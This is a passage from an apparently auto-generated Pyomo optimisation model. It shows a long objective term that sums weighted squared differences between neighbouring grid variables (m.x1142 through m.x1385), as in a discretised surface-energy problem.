m.x1142)**2) + 3.48983301616632*((8.11690209768664*m.x1170 - 8.11690209768664*m.x1143)**2 + (1.3*
m.x1144 - 1.3*m.x1143)**2) + 3.48983301616632*((8.11690209768664*m.x1171 - 8.11690209768664*
m.x1144)**2 + (1.3*m.x1145 - 1.3*m.x1144)**2) + 3.48983301616632*((8.11690209768664*m.x1172 -
8.11690209768664*m.x1145)**2 + (1.3*m.x1146 - 1.3*m.x1145)**2) + 3.48983301616632*((
8.11690209768664*m.x1173 - 8.11690209768664*m.x1146)**2 + (1.3*m.x1147 - 1.3*m.x1146)**2) +
3.48983301616632*((8.11690209768664*m.x1174 - 8.11690209768664*m.x1147)**2 + (1.3*m.x1148 - 1.3*
m.x1147)**2) + 3.48983301616632*((8.11690209768664*m.x1175 - 8.11690209768664*m.x1148)**2 + (1.3*
m.x1149 - 1.3*m.x1148)**2) + 3.48983301616632*((8.11690209768664*m.x1176 - 8.11690209768664*
m.x1149)**2 + (1.3*m.x1150 - 1.3*m.x1149)**2) + 3.48983301616632*((8.11690209768664*m.x1177 -
8.11690209768664*m.x1150)**2 + (1.3*m.x1151 - 1.3*m.x1150)**2) + 3.48983301616632*((
8.11690209768664*m.x1178 - 8.11690209768664*m.x1151)**2 + (1.3*m.x1152 - 1.3*m.x1151)**2) +
3.48983301616632*((8.11690209768664*m.x1179 - 8.11690209768664*m.x1152)**2 + (1.3*m.x1153 - 1.3*
m.x1152)**2) + 3.48983301616632*((8.11690209768664*m.x1180 - 8.11690209768664*m.x1153)**2 + (1.3*
m.x1154 - 1.3*m.x1153)**2) + 3.48983301616632*((8.11690209768664*m.x1181 - 8.11690209768664*
m.x1154)**2 + (1.3*m.x1155 - 1.3*m.x1154)**2) + 3.48983301616632*((8.11690209768664*m.x1182 -
8.11690209768664*m.x1155)**2 + (1.3*m.x1156 - 1.3*m.x1155)**2) + 3.48983301616632*((
8.11690209768664*m.x1183 - 8.11690209768664*m.x1156)**2 + (1.3*m.x1157 - 1.3*m.x1156)**2) +
3.48983301616632*((8.11690209768664*m.x1184 - 8.11690209768664*m.x1157)**2 + (1.3*m.x1158 - 1.3*
m.x1157)**2) + 3.48983301616632*((8.11690209768664*m.x1185 - 8.11690209768664*m.x1158)**2 + (1.3*
m.x1159 - 1.3*m.x1158)**2) + 3.48983301616632*((8.11690209768664*m.x1186 - 8.11690209768664*
m.x1159)**2 + (1.3*m.x1160 - 1.3*m.x1159)**2) + 3.48983301616632*((8.11690209768664*m.x1187 -
8.11690209768664*m.x1160)**2 + (1.3*m.x1161 - 1.3*m.x1160)**2) + 3.5913512836022*((
8.11690209768664*m.x1189 - 8.11690209768664*m.x1162)**2 + (1.3*m.x1163 - 1.3*m.x1162)**2) +
3.5913512836022*((8.11690209768664*m.x1190 - 8.11690209768664*m.x1163)**2 + (1.3*m.x1164 - 1.3*
m.x1163)**2) + 3.5913512836022*((8.11690209768664*m.x1191 - 8.11690209768664*m.x1164)**2 + (1.3*
m.x1165 - 1.3*m.x1164)**2) + 3.5913512836022*((8.11690209768664*m.x1192 - 8.11690209768664*
m.x1165)**2 + (1.3*m.x1166 - 1.3*m.x1165)**2) + 3.5913512836022*((8.11690209768664*m.x1193 -
8.11690209768664*m.x1166)**2 + (1.3*m.x1167 - 1.3*m.x1166)**2) + 3.5913512836022*((
8.11690209768664*m.x1194 - 8.11690209768664*m.x1167)**2 + (1.3*m.x1168 - 1.3*m.x1167)**2) +
3.5913512836022*((8.11690209768664*m.x1195 - 8.11690209768664*m.x1168)**2 + (1.3*m.x1169 - 1.3*
m.x1168)**2) + 3.5913512836022*((8.11690209768664*m.x1196 - 8.11690209768664*m.x1169)**2 + (1.3*
m.x1170 - 1.3*m.x1169)**2) + 3.5913512836022*((8.11690209768664*m.x1197 - 8.11690209768664*
m.x1170)**2 + (1.3*m.x1171 - 1.3*m.x1170)**2) + 3.5913512836022*((8.11690209768664*m.x1198 -
8.11690209768664*m.x1171)**2 + (1.3*m.x1172 - 1.3*m.x1171)**2) + 3.5913512836022*((
8.11690209768664*m.x1199 - 8.11690209768664*m.x1172)**2 + (1.3*m.x1173 - 1.3*m.x1172)**2) +
3.5913512836022*((8.11690209768664*m.x1200 - 8.11690209768664*m.x1173)**2 + (1.3*m.x1174 - 1.3*
m.x1173)**2) + 3.5913512836022*((8.11690209768664*m.x1201 - 8.11690209768664*m.x1174)**2 + (1.3*
m.x1175 - 1.3*m.x1174)**2) + 3.5913512836022*((8.11690209768664*m.x1202 - 8.11690209768664*
m.x1175)**2 + (1.3*m.x1176 - 1.3*m.x1175)**2) + 3.5913512836022*((8.11690209768664*m.x1203 -
8.11690209768664*m.x1176)**2 + (1.3*m.x1177 - 1.3*m.x1176)**2) + 3.5913512836022*((
8.11690209768664*m.x1204 - 8.11690209768664*m.x1177)**2 + (1.3*m.x1178 - 1.3*m.x1177)**2) +
3.5913512836022*((8.11690209768664*m.x1205 - 8.11690209768664*m.x1178)**2 + (1.3*m.x1179 - 1.3*
m.x1178)**2) + 3.5913512836022*((8.11690209768664*m.x1206 - 8.11690209768664*m.x1179)**2 + (1.3*
m.x1180 - 1.3*m.x1179)**2) + 3.5913512836022*((8.11690209768664*m.x1207 - 8.11690209768664*
m.x1180)**2 + (1.3*m.x1181 - 1.3*m.x1180)**2) + 3.5913512836022*((8.11690209768664*m.x1208 -
8.11690209768664*m.x1181)**2 + (1.3*m.x1182 - 1.3*m.x1181)**2) + 3.5913512836022*((
8.11690209768664*m.x1209 - 8.11690209768664*m.x1182)**2 + (1.3*m.x1183 - 1.3*m.x1182)**2) +
3.5913512836022*((8.11690209768664*m.x1210 - 8.11690209768664*m.x1183)**2 + (1.3*m.x1184 - 1.3*
m.x1183)**2) + 3.5913512836022*((8.11690209768664*m.x1211 - 8.11690209768664*m.x1184)**2 + (1.3*
m.x1185 - 1.3*m.x1184)**2) + 3.5913512836022*((8.11690209768664*m.x1212 - 8.11690209768664*
m.x1185)**2 + (1.3*m.x1186 - 1.3*m.x1185)**2) + 3.5913512836022*((8.11690209768664*m.x1213 -
8.11690209768664*m.x1186)**2 + (1.3*m.x1187 - 1.3*m.x1186)**2) + 3.5913512836022*((
8.11690209768664*m.x1214 - 8.11690209768664*m.x1187)**2 + (1.3*m.x1188 - 1.3*m.x1187)**2) +
3.68514062185326*((8.11690209768664*m.x1216 - 8.11690209768664*m.x1189)**2 + (1.3*m.x1190 - 1.3*
m.x1189)**2) + 3.68514062185326*((8.11690209768664*m.x1217 - 8.11690209768664*m.x1190)**2 + (1.3*
m.x1191 - 1.3*m.x1190)**2) + 3.68514062185326*((8.11690209768664*m.x1218 - 8.11690209768664*
m.x1191)**2 + (1.3*m.x1192 - 1.3*m.x1191)**2) + 3.68514062185326*((8.11690209768664*m.x1219 -
8.11690209768664*m.x1192)**2 + (1.3*m.x1193 - 1.3*m.x1192)**2) + 3.68514062185326*((
8.11690209768664*m.x1220 - 8.11690209768664*m.x1193)**2 + (1.3*m.x1194 - 1.3*m.x1193)**2) +
3.68514062185326*((8.11690209768664*m.x1221 - 8.11690209768664*m.x1194)**2 + (1.3*m.x1195 - 1.3*
m.x1194)**2) + 3.68514062185326*((8.11690209768664*m.x1222 - 8.11690209768664*m.x1195)**2 + (1.3*
m.x1196 - 1.3*m.x1195)**2) + 3.68514062185326*((8.11690209768664*m.x1223 - 8.11690209768664*
m.x1196)**2 + (1.3*m.x1197 - 1.3*m.x1196)**2) + 3.68514062185326*((8.11690209768664*m.x1224 -
8.11690209768664*m.x1197)**2 + (1.3*m.x1198 - 1.3*m.x1197)**2) + 3.68514062185326*((
8.11690209768664*m.x1225 - 8.11690209768664*m.x1198)**2 + (1.3*m.x1199 - 1.3*m.x1198)**2) +
3.68514062185326*((8.11690209768664*m.x1226 - 8.11690209768664*m.x1199)**2 + (1.3*m.x1200 - 1.3*
m.x1199)**2) + 3.68514062185326*((8.11690209768664*m.x1227 - 8.11690209768664*m.x1200)**2 + (1.3*
m.x1201 - 1.3*m.x1200)**2) + 3.68514062185326*((8.11690209768664*m.x1228 - 8.11690209768664*
m.x1201)**2 + (1.3*m.x1202 - 1.3*m.x1201)**2) + 3.68514062185326*((8.11690209768664*m.x1229 -
8.11690209768664*m.x1202)**2 + (1.3*m.x1203 - 1.3*m.x1202)**2) + 3.68514062185326*((
8.11690209768664*m.x1230 - 8.11690209768664*m.x1203)**2 + (1.3*m.x1204 - 1.3*m.x1203)**2) +
3.68514062185326*((8.11690209768664*m.x1231 - 8.11690209768664*m.x1204)**2 + (1.3*m.x1205 - 1.3*
m.x1204)**2) + 3.68514062185326*((8.11690209768664*m.x1232 - 8.11690209768664*m.x1205)**2 + (1.3*
m.x1206 - 1.3*m.x1205)**2) + 3.68514062185326*((8.11690209768664*m.x1233 - 8.11690209768664*
m.x1206)**2 + (1.3*m.x1207 - 1.3*m.x1206)**2) + 3.68514062185326*((8.11690209768664*m.x1234 -
8.11690209768664*m.x1207)**2 + (1.3*m.x1208 - 1.3*m.x1207)**2) + 3.68514062185326*((
8.11690209768664*m.x1235 - 8.11690209768664*m.x1208)**2 + (1.3*m.x1209 - 1.3*m.x1208)**2) +
3.68514062185326*((8.11690209768664*m.x1236 - 8.11690209768664*m.x1209)**2 + (1.3*m.x1210 - 1.3*
m.x1209)**2) + 3.68514062185326*((8.11690209768664*m.x1237 - 8.11690209768664*m.x1210)**2 + (1.3*
m.x1211 - 1.3*m.x1210)**2) + 3.68514062185326*((8.11690209768664*m.x1238 - 8.11690209768664*
m.x1211)**2 + (1.3*m.x1212 - 1.3*m.x1211)**2) + 3.68514062185326*((8.11690209768664*m.x1239 -
8.11690209768664*m.x1212)**2 + (1.3*m.x1213 - 1.3*m.x1212)**2) + 3.68514062185326*((
8.11690209768664*m.x1240 - 8.11690209768664*m.x1213)**2 + (1.3*m.x1214 - 1.3*m.x1213)**2) +
3.68514062185326*((8.11690209768664*m.x1241 - 8.11690209768664*m.x1214)**2 + (1.3*m.x1215 - 1.3*
m.x1214)**2) + 3.7692665538586*((8.11690209768664*m.x1243 - 8.11690209768664*m.x1216)**2 + (1.3*
m.x1217 - 1.3*m.x1216)**2) + 3.7692665538586*((8.11690209768664*m.x1244 - 8.11690209768664*
m.x1217)**2 + (1.3*m.x1218 - 1.3*m.x1217)**2) + 3.7692665538586*((8.11690209768664*m.x1245 -
8.11690209768664*m.x1218)**2 + (1.3*m.x1219 - 1.3*m.x1218)**2) + 3.7692665538586*((
8.11690209768664*m.x1246 - 8.11690209768664*m.x1219)**2 + (1.3*m.x1220 - 1.3*m.x1219)**2) +
3.7692665538586*((8.11690209768664*m.x1247 - 8.11690209768664*m.x1220)**2 + (1.3*m.x1221 - 1.3*
m.x1220)**2) + 3.7692665538586*((8.11690209768664*m.x1248 - 8.11690209768664*m.x1221)**2 + (1.3*
m.x1222 - 1.3*m.x1221)**2) + 3.7692665538586*((8.11690209768664*m.x1249 - 8.11690209768664*
m.x1222)**2 + (1.3*m.x1223 - 1.3*m.x1222)**2) + 3.7692665538586*((8.11690209768664*m.x1250 -
8.11690209768664*m.x1223)**2 + (1.3*m.x1224 - 1.3*m.x1223)**2) + 3.7692665538586*((
8.11690209768664*m.x1251 - 8.11690209768664*m.x1224)**2 + (1.3*m.x1225 - 1.3*m.x1224)**2) +
3.7692665538586*((8.11690209768664*m.x1252 - 8.11690209768664*m.x1225)**2 + (1.3*m.x1226 - 1.3*
m.x1225)**2) + 3.7692665538586*((8.11690209768664*m.x1253 - 8.11690209768664*m.x1226)**2 + (1.3*
m.x1227 - 1.3*m.x1226)**2) + 3.7692665538586*((8.11690209768664*m.x1254 - 8.11690209768664*
m.x1227)**2 + (1.3*m.x1228 - 1.3*m.x1227)**2) + 3.7692665538586*((8.11690209768664*m.x1255 -
8.11690209768664*m.x1228)**2 + (1.3*m.x1229 - 1.3*m.x1228)**2) + 3.7692665538586*((
8.11690209768664*m.x1256 - 8.11690209768664*m.x1229)**2 + (1.3*m.x1230 - 1.3*m.x1229)**2) +
3.7692665538586*((8.11690209768664*m.x1257 - 8.11690209768664*m.x1230)**2 + (1.3*m.x1231 - 1.3*
m.x1230)**2) + 3.7692665538586*((8.11690209768664*m.x1258 - 8.11690209768664*m.x1231)**2 + (1.3*
m.x1232 - 1.3*m.x1231)**2) + 3.7692665538586*((8.11690209768664*m.x1259 - 8.11690209768664*
m.x1232)**2 + (1.3*m.x1233 - 1.3*m.x1232)**2) + 3.7692665538586*((8.11690209768664*m.x1260 -
8.11690209768664*m.x1233)**2 + (1.3*m.x1234 - 1.3*m.x1233)**2) + 3.7692665538586*((
8.11690209768664*m.x1261 - 8.11690209768664*m.x1234)**2 + (1.3*m.x1235 - 1.3*m.x1234)**2) +
3.7692665538586*((8.11690209768664*m.x1262 - 8.11690209768664*m.x1235)**2 + (1.3*m.x1236 - 1.3*
m.x1235)**2) + 3.7692665538586*((8.11690209768664*m.x1263 - 8.11690209768664*m.x1236)**2 + (1.3*
m.x1237 - 1.3*m.x1236)**2) + 3.7692665538586*((8.11690209768664*m.x1264 - 8.11690209768664*
m.x1237)**2 + (1.3*m.x1238 - 1.3*m.x1237)**2) + 3.7692665538586*((8.11690209768664*m.x1265 -
8.11690209768664*m.x1238)**2 + (1.3*m.x1239 - 1.3*m.x1238)**2) + 3.7692665538586*((
8.11690209768664*m.x1266 - 8.11690209768664*m.x1239)**2 + (1.3*m.x1240 - 1.3*m.x1239)**2) +
3.7692665538586*((8.11690209768664*m.x1267 - 8.11690209768664*m.x1240)**2 + (1.3*m.x1241 - 1.3*
m.x1240)**2) + 3.7692665538586*((8.11690209768664*m.x1268 - 8.11690209768664*m.x1241)**2 + (1.3*
m.x1242 - 1.3*m.x1241)**2) + 3.84193404586726*((8.11690209768664*m.x1270 - 8.11690209768664*
m.x1243)**2 + (1.3*m.x1244 - 1.3*m.x1243)**2) + 3.84193404586726*((8.11690209768664*m.x1271 -
8.11690209768664*m.x1244)**2 + (1.3*m.x1245 - 1.3*m.x1244)**2) + 3.84193404586726*((
8.11690209768664*m.x1272 - 8.11690209768664*m.x1245)**2 + (1.3*m.x1246 - 1.3*m.x1245)**2) +
3.84193404586726*((8.11690209768664*m.x1273 - 8.11690209768664*m.x1246)**2 + (1.3*m.x1247 - 1.3*
m.x1246)**2) + 3.84193404586726*((8.11690209768664*m.x1274 - 8.11690209768664*m.x1247)**2 + (1.3*
m.x1248 - 1.3*m.x1247)**2) + 3.84193404586726*((8.11690209768664*m.x1275 - 8.11690209768664*
m.x1248)**2 + (1.3*m.x1249 - 1.3*m.x1248)**2) + 3.84193404586726*((8.11690209768664*m.x1276 -
8.11690209768664*m.x1249)**2 + (1.3*m.x1250 - 1.3*m.x1249)**2) + 3.84193404586726*((
8.11690209768664*m.x1277 - 8.11690209768664*m.x1250)**2 + (1.3*m.x1251 - 1.3*m.x1250)**2) +
3.84193404586726*((8.11690209768664*m.x1278 - 8.11690209768664*m.x1251)**2 + (1.3*m.x1252 - 1.3*
m.x1251)**2) + 3.84193404586726*((8.11690209768664*m.x1279 - 8.11690209768664*m.x1252)**2 + (1.3*
m.x1253 - 1.3*m.x1252)**2) + 3.84193404586726*((8.11690209768664*m.x1280 - 8.11690209768664*
m.x1253)**2 + (1.3*m.x1254 - 1.3*m.x1253)**2) + 3.84193404586726*((8.11690209768664*m.x1281 -
8.11690209768664*m.x1254)**2 + (1.3*m.x1255 - 1.3*m.x1254)**2) + 3.84193404586726*((
8.11690209768664*m.x1282 - 8.11690209768664*m.x1255)**2 + (1.3*m.x1256 - 1.3*m.x1255)**2) +
3.84193404586726*((8.11690209768664*m.x1283 - 8.11690209768664*m.x1256)**2 + (1.3*m.x1257 - 1.3*
m.x1256)**2) + 3.84193404586726*((8.11690209768664*m.x1284 - 8.11690209768664*m.x1257)**2 + (1.3*
m.x1258 - 1.3*m.x1257)**2) + 3.84193404586726*((8.11690209768664*m.x1285 - 8.11690209768664*
m.x1258)**2 + (1.3*m.x1259 - 1.3*m.x1258)**2) + 3.84193404586726*((8.11690209768664*m.x1286 -
8.11690209768664*m.x1259)**2 + (1.3*m.x1260 - 1.3*m.x1259)**2) + 3.84193404586726*((
8.11690209768664*m.x1287 - 8.11690209768664*m.x1260)**2 + (1.3*m.x1261 - 1.3*m.x1260)**2) +
3.84193404586726*((8.11690209768664*m.x1288 - 8.11690209768664*m.x1261)**2 + (1.3*m.x1262 - 1.3*
m.x1261)**2) + 3.84193404586726*((8.11690209768664*m.x1289 - 8.11690209768664*m.x1262)**2 + (1.3*
m.x1263 - 1.3*m.x1262)**2) + 3.84193404586726*((8.11690209768664*m.x1290 - 8.11690209768664*
m.x1263)**2 + (1.3*m.x1264 - 1.3*m.x1263)**2) + 3.84193404586726*((8.11690209768664*m.x1291 -
8.11690209768664*m.x1264)**2 + (1.3*m.x1265 - 1.3*m.x1264)**2) + 3.84193404586726*((
8.11690209768664*m.x1292 - 8.11690209768664*m.x1265)**2 + (1.3*m.x1266 - 1.3*m.x1265)**2) +
3.84193404586726*((8.11690209768664*m.x1293 - 8.11690209768664*m.x1266)**2 + (1.3*m.x1267 - 1.3*
m.x1266)**2) + 3.84193404586726*((8.11690209768664*m.x1294 - 8.11690209768664*m.x1267)**2 + (1.3*
m.x1268 - 1.3*m.x1267)**2) + 3.84193404586726*((8.11690209768664*m.x1295 - 8.11690209768664*
m.x1268)**2 + (1.3*m.x1269 - 1.3*m.x1268)**2) + 3.90154814179696*((8.11690209768664*m.x1297 -
8.11690209768664*m.x1270)**2 + (1.3*m.x1271 - 1.3*m.x1270)**2) + 3.90154814179696*((
8.11690209768664*m.x1298 - 8.11690209768664*m.x1271)**2 + (1.3*m.x1272 - 1.3*m.x1271)**2) +
3.90154814179696*((8.11690209768664*m.x1299 - 8.11690209768664*m.x1272)**2 + (1.3*m.x1273 - 1.3*
m.x1272)**2) + 3.90154814179696*((8.11690209768664*m.x1300 - 8.11690209768664*m.x1273)**2 + (1.3*
m.x1274 - 1.3*m.x1273)**2) + 3.90154814179696*((8.11690209768664*m.x1301 - 8.11690209768664*
m.x1274)**2 + (1.3*m.x1275 - 1.3*m.x1274)**2) + 3.90154814179696*((8.11690209768664*m.x1302 -
8.11690209768664*m.x1275)**2 + (1.3*m.x1276 - 1.3*m.x1275)**2) + 3.90154814179696*((
8.11690209768664*m.x1303 - 8.11690209768664*m.x1276)**2 + (1.3*m.x1277 - 1.3*m.x1276)**2) +
3.90154814179696*((8.11690209768664*m.x1304 - 8.11690209768664*m.x1277)**2 + (1.3*m.x1278 - 1.3*
m.x1277)**2) + 3.90154814179696*((8.11690209768664*m.x1305 - 8.11690209768664*m.x1278)**2 + (1.3*
m.x1279 - 1.3*m.x1278)**2) + 3.90154814179696*((8.11690209768664*m.x1306 - 8.11690209768664*
m.x1279)**2 + (1.3*m.x1280 - 1.3*m.x1279)**2) + 3.90154814179696*((8.11690209768664*m.x1307 -
8.11690209768664*m.x1280)**2 + (1.3*m.x1281 - 1.3*m.x1280)**2) + 3.90154814179696*((
8.11690209768664*m.x1308 - 8.11690209768664*m.x1281)**2 + (1.3*m.x1282 - 1.3*m.x1281)**2) +
3.90154814179696*((8.11690209768664*m.x1309 - 8.11690209768664*m.x1282)**2 + (1.3*m.x1283 - 1.3*
m.x1282)**2) + 3.90154814179696*((8.11690209768664*m.x1310 - 8.11690209768664*m.x1283)**2 + (1.3*
m.x1284 - 1.3*m.x1283)**2) + 3.90154814179696*((8.11690209768664*m.x1311 - 8.11690209768664*
m.x1284)**2 + (1.3*m.x1285 - 1.3*m.x1284)**2) + 3.90154814179696*((8.11690209768664*m.x1312 -
8.11690209768664*m.x1285)**2 + (1.3*m.x1286 - 1.3*m.x1285)**2) + 3.90154814179696*((
8.11690209768664*m.x1313 - 8.11690209768664*m.x1286)**2 + (1.3*m.x1287 - 1.3*m.x1286)**2) +
3.90154814179696*((8.11690209768664*m.x1314 - 8.11690209768664*m.x1287)**2 + (1.3*m.x1288 - 1.3*
m.x1287)**2) + 3.90154814179696*((8.11690209768664*m.x1315 - 8.11690209768664*m.x1288)**2 + (1.3*
m.x1289 - 1.3*m.x1288)**2) + 3.90154814179696*((8.11690209768664*m.x1316 - 8.11690209768664*
m.x1289)**2 + (1.3*m.x1290 - 1.3*m.x1289)**2) + 3.90154814179696*((8.11690209768664*m.x1317 -
8.11690209768664*m.x1290)**2 + (1.3*m.x1291 - 1.3*m.x1290)**2) + 3.90154814179696*((
8.11690209768664*m.x1318 - 8.11690209768664*m.x1291)**2 + (1.3*m.x1292 - 1.3*m.x1291)**2) +
3.90154814179696*((8.11690209768664*m.x1319 - 8.11690209768664*m.x1292)**2 + (1.3*m.x1293 - 1.3*
m.x1292)**2) + 3.90154814179696*((8.11690209768664*m.x1320 - 8.11690209768664*m.x1293)**2 + (1.3*
m.x1294 - 1.3*m.x1293)**2) + 3.90154814179696*((8.11690209768664*m.x1321 - 8.11690209768664*
m.x1294)**2 + (1.3*m.x1295 - 1.3*m.x1294)**2) + 3.90154814179696*((8.11690209768664*m.x1322 -
8.11690209768664*m.x1295)**2 + (1.3*m.x1296 - 1.3*m.x1295)**2) + 3.94677031865286*((
8.11690209768664*m.x1324 - 8.11690209768664*m.x1297)**2 + (1.3*m.x1298 - 1.3*m.x1297)**2) +
3.94677031865286*((8.11690209768664*m.x1325 - 8.11690209768664*m.x1298)**2 + (1.3*m.x1299 - 1.3*
m.x1298)**2) + 3.94677031865286*((8.11690209768664*m.x1326 - 8.11690209768664*m.x1299)**2 + (1.3*
m.x1300 - 1.3*m.x1299)**2) + 3.94677031865286*((8.11690209768664*m.x1327 - 8.11690209768664*
m.x1300)**2 + (1.3*m.x1301 - 1.3*m.x1300)**2) + 3.94677031865286*((8.11690209768664*m.x1328 -
8.11690209768664*m.x1301)**2 + (1.3*m.x1302 - 1.3*m.x1301)**2) + 3.94677031865286*((
8.11690209768664*m.x1329 - 8.11690209768664*m.x1302)**2 + (1.3*m.x1303 - 1.3*m.x1302)**2) +
3.94677031865286*((8.11690209768664*m.x1330 - 8.11690209768664*m.x1303)**2 + (1.3*m.x1304 - 1.3*
m.x1303)**2) + 3.94677031865286*((8.11690209768664*m.x1331 - 8.11690209768664*m.x1304)**2 + (1.3*
m.x1305 - 1.3*m.x1304)**2) + 3.94677031865286*((8.11690209768664*m.x1332 - 8.11690209768664*
m.x1305)**2 + (1.3*m.x1306 - 1.3*m.x1305)**2) + 3.94677031865286*((8.11690209768664*m.x1333 -
8.11690209768664*m.x1306)**2 + (1.3*m.x1307 - 1.3*m.x1306)**2) + 3.94677031865286*((
8.11690209768664*m.x1334 - 8.11690209768664*m.x1307)**2 + (1.3*m.x1308 - 1.3*m.x1307)**2) +
3.94677031865286*((8.11690209768664*m.x1335 - 8.11690209768664*m.x1308)**2 + (1.3*m.x1309 - 1.3*
m.x1308)**2) + 3.94677031865286*((8.11690209768664*m.x1336 - 8.11690209768664*m.x1309)**2 + (1.3*
m.x1310 - 1.3*m.x1309)**2) + 3.94677031865286*((8.11690209768664*m.x1337 - 8.11690209768664*
m.x1310)**2 + (1.3*m.x1311 - 1.3*m.x1310)**2) + 3.94677031865286*((8.11690209768664*m.x1338 -
8.11690209768664*m.x1311)**2 + (1.3*m.x1312 - 1.3*m.x1311)**2) + 3.94677031865286*((
8.11690209768664*m.x1339 - 8.11690209768664*m.x1312)**2 + (1.3*m.x1313 - 1.3*m.x1312)**2) +
3.94677031865286*((8.11690209768664*m.x1340 - 8.11690209768664*m.x1313)**2 + (1.3*m.x1314 - 1.3*
m.x1313)**2) + 3.94677031865286*((8.11690209768664*m.x1341 - 8.11690209768664*m.x1314)**2 + (1.3*
m.x1315 - 1.3*m.x1314)**2) + 3.94677031865286*((8.11690209768664*m.x1342 - 8.11690209768664*
m.x1315)**2 + (1.3*m.x1316 - 1.3*m.x1315)**2) + 3.94677031865286*((8.11690209768664*m.x1343 -
8.11690209768664*m.x1316)**2 + (1.3*m.x1317 - 1.3*m.x1316)**2) + 3.94677031865286*((
8.11690209768664*m.x1344 - 8.11690209768664*m.x1317)**2 + (1.3*m.x1318 - 1.3*m.x1317)**2) +
3.94677031865286*((8.11690209768664*m.x1345 - 8.11690209768664*m.x1318)**2 + (1.3*m.x1319 - 1.3*
m.x1318)**2) + 3.94677031865286*((8.11690209768664*m.x1346 - 8.11690209768664*m.x1319)**2 + (1.3*
m.x1320 - 1.3*m.x1319)**2) + 3.94677031865286*((8.11690209768664*m.x1347 - 8.11690209768664*
m.x1320)**2 + (1.3*m.x1321 - 1.3*m.x1320)**2) + 3.94677031865286*((8.11690209768664*m.x1348 -
8.11690209768664*m.x1321)**2 + (1.3*m.x1322 - 1.3*m.x1321)**2) + 3.94677031865286*((
8.11690209768664*m.x1349 - 8.11690209768664*m.x1322)**2 + (1.3*m.x1323 - 1.3*m.x1322)**2) +
3.97656744441955*((8.11690209768664*m.x1351 - 8.11690209768664*m.x1324)**2 + (1.3*m.x1325 - 1.3*
m.x1324)**2) + 3.97656744441955*((8.11690209768664*m.x1352 - 8.11690209768664*m.x1325)**2 + (1.3*
m.x1326 - 1.3*m.x1325)**2) + 3.97656744441955*((8.11690209768664*m.x1353 - 8.11690209768664*
m.x1326)**2 + (1.3*m.x1327 - 1.3*m.x1326)**2) + 3.97656744441955*((8.11690209768664*m.x1354 -
8.11690209768664*m.x1327)**2 + (1.3*m.x1328 - 1.3*m.x1327)**2) + 3.97656744441955*((
8.11690209768664*m.x1355 - 8.11690209768664*m.x1328)**2 + (1.3*m.x1329 - 1.3*m.x1328)**2) +
3.97656744441955*((8.11690209768664*m.x1356 - 8.11690209768664*m.x1329)**2 + (1.3*m.x1330 - 1.3*
m.x1329)**2) + 3.97656744441955*((8.11690209768664*m.x1357 - 8.11690209768664*m.x1330)**2 + (1.3*
m.x1331 - 1.3*m.x1330)**2) + 3.97656744441955*((8.11690209768664*m.x1358 - 8.11690209768664*
m.x1331)**2 + (1.3*m.x1332 - 1.3*m.x1331)**2) + 3.97656744441955*((8.11690209768664*m.x1359 -
8.11690209768664*m.x1332)**2 + (1.3*m.x1333 - 1.3*m.x1332)**2) + 3.97656744441955*((
8.11690209768664*m.x1360 - 8.11690209768664*m.x1333)**2 + (1.3*m.x1334 - 1.3*m.x1333)**2) +
3.97656744441955*((8.11690209768664*m.x1361 - 8.11690209768664*m.x1334)**2 + (1.3*m.x1335 - 1.3*
m.x1334)**2) + 3.97656744441955*((8.11690209768664*m.x1362 - 8.11690209768664*m.x1335)**2 + (1.3*
m.x1336 - 1.3*m.x1335)**2) + 3.97656744441955*((8.11690209768664*m.x1363 - 8.11690209768664*
m.x1336)**2 + (1.3*m.x1337 - 1.3*m.x1336)**2) + 3.97656744441955*((8.11690209768664*m.x1364 -
8.11690209768664*m.x1337)**2 + (1.3*m.x1338 - 1.3*m.x1337)**2) + 3.97656744441955*((
8.11690209768664*m.x1365 - 8.11690209768664*m.x1338)**2 + (1.3*m.x1339 - 1.3*m.x1338)**2) +
3.97656744441955*((8.11690209768664*m.x1366 - 8.11690209768664*m.x1339)**2 + (1.3*m.x1340 - 1.3*
m.x1339)**2) + 3.97656744441955*((8.11690209768664*m.x1367 - 8.11690209768664*m.x1340)**2 + (1.3*
m.x1341 - 1.3*m.x1340)**2) + 3.97656744441955*((8.11690209768664*m.x1368 - 8.11690209768664*
m.x1341)**2 + (1.3*m.x1342 - 1.3*m.x1341)**2) + 3.97656744441955*((8.11690209768664*m.x1369 -
8.11690209768664*m.x1342)**2 + (1.3*m.x1343 - 1.3*m.x1342)**2) + 3.97656744441955*((
8.11690209768664*m.x1370 - 8.11690209768664*m.x1343)**2 + (1.3*m.x1344 - 1.3*m.x1343)**2) +
3.97656744441955*((8.11690209768664*m.x1371 - 8.11690209768664*m.x1344)**2 + (1.3*m.x1345 - 1.3*
m.x1344)**2) + 3.97656744441955*((8.11690209768664*m.x1372 - 8.11690209768664*m.x1345)**2 + (1.3*
m.x1346 - 1.3*m.x1345)**2) + 3.97656744441955*((8.11690209768664*m.x1373 - 8.11690209768664*
m.x1346)**2 + (1.3*m.x1347 - 1.3*m.x1346)**2) + 3.97656744441955*((8.11690209768664*m.x1374 -
8.11690209768664*m.x1347)**2 + (1.3*m.x1348 - 1.3*m.x1347)**2) + 3.97656744441955*((
8.11690209768664*m.x1375 - 8.11690209768664*m.x1348)**2 + (1.3*m.x1349 - 1.3*m.x1348)**2) +
3.97656744441955*((8.11690209768664*m.x1376 - 8.11690209768664*m.x1349)**2 + (1.3*m.x1350 - 1.3*
m.x1349)**2) + 3.99025054038171*((8.11690209768664*m.x1378 - 8.11690209768664*m.x1351)**2 + (1.3*
m.x1352 - 1.3*m.x1351)**2) + 3.99025054038171*((8.11690209768664*m.x1379 - 8.11690209768664*
m.x1352)**2 + (1.3*m.x1353 - 1.3*m.x1352)**2) + 3.99025054038171*((8.11690209768664*m.x1380 -
8.11690209768664*m.x1353)**2 + (1.3*m.x1354 - 1.3*m.x1353)**2) + 3.99025054038171*((
8.11690209768664*m.x1381 - 8.11690209768664*m.x1354)**2 + (1.3*m.x1355 - 1.3*m.x1354)**2) +
3.99025054038171*((8.11690209768664*m.x1382 - 8.11690209768664*m.x1355)**2 + (1.3*m.x1356 - 1.3*
m.x1355)**2) + 3.99025054038171*((8.11690209768664*m.x1383 - 8.11690209768664*m.x1356)**2 + (1.3*
m.x1357 - 1.3*m.x1356)**2) + 3.99025054038171*((8.11690209768664*m.x1384 - 8.11690209768664*
m.x1357)**2 + (1.3*m.x1358 - 1.3*m.x1357)**2) + 3.99025054038171*((8.11690209768664*m.x1385 -
8.11690209768664*m.x1358)**2 + (1.3*m.x1359 - 1.3*m.x1358)**2) + 3.99025054038171*((
